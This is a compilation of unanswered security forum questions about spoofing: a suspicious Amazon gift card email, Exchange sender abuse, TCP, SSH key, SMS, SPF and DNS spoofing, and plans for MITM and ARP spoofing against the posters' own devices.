email spoofing – Amazon gift card phishing/spam — what’s the point?

I recently received an email message with the subject “San Diego Site Leadership and Management Team sent you an Amazon Gift Card!”, sent to my work address, apparently from “Amazon.com Gift Cards <gc-orders@gc.email.amazon.com>“.

I was suspicious because there was no mention of my employer’s name, just a generic message:

Please enjoy this $50.00 Amazon gift card to purchase
an item of your choice to kick-off Q4 and in recognition
of your hard work. We appreciate you!
#SDThePlaceToBe

It included a plausible looking “Claim Code” for the gift card. The code resembles “TIAT-UTAHBX-3V4T”. (The actual code has the same pattern of uppercase letters and decimal digits.)

To be clear, I haven’t clicked on any links in the email or tried to use the claim code, and I don’t intend to.

I checked with my employer, who confirmed that they had not sent it, and with Amazon support, who confirmed that I had not been sent an email gift card.

So far, this sounds like an ordinary phishing attempt, which I would just report and ignore, but here’s the strange part.

I’ve examined the headers and saw no suspicious links. There were several links within the email (none of which I clicked) that led to amazon.com URLs, plus sharing links at the bottom for Facebook, Twitter, Instagram, and Pinterest. As far as I can tell, even if I fell for this phishing attempt, no information would get back to whoever sent it. The claim code is presumably invalid, but if I tried to redeem it I presume it would simply fail (that’s according to Amazon support).

So my question is — what’s the point? Is this kind of phishing email without any dangerous links common? Is there any way the sender could benefit, or harm me, if I clicked on a link that goes to an amazon.com address?

I’m hesitant to share the entire message, but please let me know if more information would be helpful.

security – How to stop email spoofing within org?

I recently realized that the script I am using to send me emails from task scheduler can be misused like I could use the script to send an email from anyone on my Exchange to any other person.

A] How can I stop this….this is not a question about domain spoofing, this is about the script being able to use any account to send email without the password.

B]If I stop it…what changes will I need to make to my script so that I can keep receiving email about logs and other reports and stuff.

We are using Exchange 2016. The script I am using just uses $messageParameters having the mail Subject, Body, From, To & SMTP Server

Does an attacker need to guess or brute-force a password for TCP spoofing?

From my understanding, TCP spoofing can be carried out if the attacker can correctly guess the sequence numbers from the response packets (to mimic the real client). The attacker may even obtain this sequence of numbers via sniffing. Furthermore, a trusted connection must already exist between the target client and the server in order for the attacker to intercept/spoof

However, I was a bit unclear as to whether the attacker would need to gain initial access to the system or network (by guessing or brute-forcing their password). In order to send the sequence numbers from response packets to the server, does the attacker need to have access to it? I am not sure whether this attacker can just send the SYN packets to the server without any access to the system/network. My concept of these things is a bit blurry right now and I would greatly appreciate some advice.

Thank you!

python – How Can I Prevent Hackers From Spoofing TCP messages onto my server?

I have a Python client and server communicating over a TCP socket – they send and receive a certain set of standardized string commands to each other.

How can I prevent a hacker from creating their own client that sends the same kind of string commands (but with their own values) to the server?

Is it right that I can assume the hacker has access to the TCP messages being transmitted/received, but not the individual code that is being executed (if I only give them the executable)?

I’m new to network security and wanted to decide how best to design my network communication scheme.

Idea – I was imagining that I could possibly encrypt the messages before sending and decrypt on the server (assuming the hacker can’t find any of the keys in the source code?). Is this a secure way of going about it and am I on the right track?

rsa – What prevents someone from spoofing their public key when trying to establish an SSH connection?

Recently I’ve been trying to learn the mechanisms behind SSH keys but I came across this question that I haven’t been able to find an answer to (I haven’t figured out how to word my question such that searching it would give me the answer).

Basically, we add our local machine’s public key to the server’s authorized_keys file which allows us to be authenticated automatically when we try to ssh into the server later on. My question is: what if someone takes my public key (it is public after all) and replaces their public key with it? When the “attacker” tries to connect to the server, what part of the process allows the server to know that they do not have the correct private key?

I read somewhere that for RSA, it is possible for a user (let’s say user A) to encrypt/sign a message with their private key, and then for others to decrypt this message using A‘s public key, thus proving that A is really who they claim to be. However, apparently, this is not true for all cryptosystems, where it is not possible to sign with a private key (according to What happens when encrypting with private key?, feel free to correct this information if it is wrong). In those cases, how does the server make sure that the user is really who they claim to be?

spoofing – Please help: possible case of SMS spoof?

So the other night my boyfriend and I got some texts from a local number saying some hateful things. We both texted back and tried calling multiple times, but the number rang and went to a strange automated voicemail. My bf texted a few things and said to call back and finally he gets a text from a completely different phone number saying to call, they are ready. Bf calls and a man answers the phone. Bf says ‘hey you told me to call’ and the guy says he got a text message from him (bf) to call. We realized something wasn’t right. The guy was obviously asleep and so bf apologized and hung up. The next day we called the original number that texted and it went to the guy again who answered the previous night. We asked the guy his number and it was completely different than what we dialed. We hung up and dialed again and it went to the guy’s number again. I looked up call spoofing and it sounds like this may be what has happened. But I couldn’t understand why when we texted or called this first number (where we got the original crazy texts from) would then forward to a totally different number. Thoughts?

bug bounty – SPF record does not preventing the sender spoofing

I am bug hunter & still new in bug bounty programs.
I’ve reached to this topic which I can’t go further before understanding this one .

I used one of the most SPF record finder online , the result of this test was they already have a SPF record

BUT

I still can send an email as their domain exactly!

so , does really SPF record prevent email spoofing attack?
If it does, why I still can send an email as their domain exactly ?, if it doesn’t, how can we really prevent the email spoofing attacks

also maybe I’ve some misunderstanding between SPF misconfiguration & missing of SPF record
do they mean same ?!
what is the situation as written above is it a misconfiguration or missing SPF record ?!

regards

How to prevent from DNS spoofing in Java code which obtains a name of localhost

FORTIFY static scan has detected that this piece of our java code is vulnerable to DNS spoofing attack:

public String getLocalhostName(){
    try {
        return Inet4Address.getLocalHost().getHostName();
    } catch (UnknownHostException e) {
        return null;
    }
}

FORTIFY also gives these recommendations:

Recommendations:

You can increase confidence in a domain name lookup if you check to
make sure that the host’s forward and backward DNS entries match.
Attackers will not be able to spoof both the forward and the reverse
DNS entries without controlling the nameservers for the target domain.
This is not a foolproof approach however: attackers may be able to
convince the domain registrar to turn over the domain to a malicious
nameserver. Basing authentication on DNS entries is simply a risky
proposition.

My questions are:

  1. Is getting the local host name really vulnerable to such an attack ? I can’t imagine such a scenario.
  2. How to implement this check in practice (in this code snippet)?

Tkank you.

tls – DNS spoofing via ssl (https) by mitm with own wlan server

Problem: I have a local machine (IoT, lets call it MCC) which connects via SSL to a website (mcc.com) to get some JSON data. I would like to send modified JSON from my own server.

Idea: Setup a local device (lets call is rasp) which opens a wifi hotspot. The MCC should then connect to the rasp. The rasp answers with a certificate from the public server mcc.com, but sends the modified JSON data.

I am not familiar with DNS, but I expect this to be difficult as we do not own the public key of mcc.com. Does someone know some solution here? The MCC does not use some kind of DNS over https.

do i need to turn on monitor mode while doing MITM attack and arp spoofing?

I want to my attack my old PC by ARP spoofing and do some MITM attack .So i was wondering if i need to turn on monitor mode or i can do those attack in managed mode?